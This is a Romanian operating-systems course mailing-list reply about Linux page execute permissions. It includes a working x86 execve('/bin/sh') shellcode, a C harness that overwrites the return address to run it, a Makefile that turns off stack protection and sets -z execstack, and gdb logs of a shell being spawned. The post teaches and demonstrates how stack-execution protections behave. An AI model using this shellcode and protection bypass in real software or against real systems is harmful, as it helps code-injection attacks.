[so] pagini si drepturi de executie in Linux. security. (textul corect, v2)
Dragos Tarcatu
tarcatu_dragosh at yahoo.com
Wed Jun 6 16:18:43 EEST 2012
Alexandru,
Cred că problema provine din faptul că nu compilezi programul așa cum ar trebui (aliniament corect de stivă + dezactivarea sistemelor de protecție la stack smashing). Am făcut câteva modificări asupra shellcode-ului [1] și am inclus un Makefile [2].
În principiu cel mai mare impact din ce observ eu îl are flag-ul -z execstack care marchează explicit pagini ca fiind executabile:
Uite cum a mers la mine treaba:
-z execstack disabled:
[dtarcatu at wlan-itc-lnx-shell21 test]$ gdb ./test
GNU gdb (GDB) Red Hat Enterprise Linux (7.0.1-32.el5)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /homes/dtarcatu/workspace/test/test...done.
(gdb) break main
Breakpoint 1 at 0x804837a: file test.c, line 20.
(gdb) run
Starting program: /homes/dtarcatu/workspace/test/test
Breakpoint 1, main () at test.c:20
20 ret = (int *)&ret + 2;
(gdb) s
21 *ret = (int)sc;
(gdb) s
23 return 0;
(gdb) s
24 }
(gdb) s
0x080495dc in sc ()
(gdb) s
Single stepping until exit from function sc,
which has no line number information.
Program received signal SIGSEGV, Segmentation fault.
0x080495dc in sc ()
Address space layout:
22760: /homes/dtarcatu/workspace/test/test
0034f000 4K r-x-- [ anon ]
0052d000 108K r-x-- /lib/ld-2.5.so
00548000 4K r---- /lib/ld-2.5.so
00549000 4K rw--- /lib/ld-2.5.so
00551000 1356K r-x-- /lib/libc-2.5.so
006a4000 8K r---- /lib/libc-2.5.so
006a6000 4K rw--- /lib/libc-2.5.so
006a7000 12K rw--- [ anon ]
08048000 4K r-x-- /homes/dtarcatu/workspace/test/test
08049000 4K rw--- /homes/dtarcatu/workspace/test/test
b7fe8000 8K rw--- [ anon ]
bffea000 84K rw--- [ stack ]
total 1600K
-z execstack enabled:
[dtarcatu at wlan-itc-lnx-shell21 test]$ gdb ./test
GNU gdb (GDB) Red Hat Enterprise Linux (7.0.1-32.el5)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /homes/dtarcatu/workspace/test/test...done.
(gdb) break main
Breakpoint 1 at 0x804837a: file test.c, line 20.
(gdb) run
Starting program: /homes/dtarcatu/workspace/test/test
warning: .dynamic section for "/lib/libc.so.6" is not at the expected address
warning: difference appears to be caused by prelink, adjusting expectations
Breakpoint 1, main () at test.c:20
20 ret = (int *)&ret + 2;
(gdb) s
21 *ret = (int)sc;
(gdb) s
23 return 0;
(gdb) s
24 }
(gdb) s
0x080495dc in sc ()
(gdb) s
Single stepping until exit from function sc,
which has no line number information.
Executing new program: /bin/bash
Breakpoint 1, 0x0805d921 in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
sh-3.2$
Address space layout:
22802: /homes/dtarcatu/workspace/test/test
00110000 1356K r-x-- /lib/libc-2.5.so
00263000 8K r-x-- /lib/libc-2.5.so
00265000 4K rwx-- /lib/libc-2.5.so
00266000 12K rwx-- [ anon ]
0052d000 108K r-x-- /lib/ld-2.5.so
00548000 4K r-x-- /lib/ld-2.5.so
00549000 4K rwx-- /lib/ld-2.5.so
00627000 4K rwx-- [ anon ]
006fc000 4K rwx-- [ anon ]
007dd000 4K r-x-- [ anon ]
08048000 4K r-x-- /homes/dtarcatu/workspace/test/test
08049000 4K rwx-- /homes/dtarcatu/workspace/test/test
bffea000 84K rwx-- [ stack ]
total 1600K
Mersi,
Dragoș
PS: Aparent nu pot trece cu atașamente prin proxy așa că listez codul direct ...
[1]
char sc[]= /* 24 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
//"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
int main()
{
int *ret;
ret = (int *)&ret + 2;
*ret = (int)sc;
return 0;
}
[2]
all: astest test
test: test.c
gcc -g -ggdb -mpreferred-stack-boundary=2 -o test test.c -fno-stack-protector -z execstack
astest:
as -o astest.o astest.s -ggstabs
ld -o astest astest.o
clean:
rm -f *~ *.o test astest
[*]
.text
.globl _start
_start:
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
#cdql
movb $0x0b,%al
int $0x80
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://cursuri.cs.pub.ro/pipermail/so/attachments/20120606/ee3fa474/attachment.html>
More information about the so
mailing list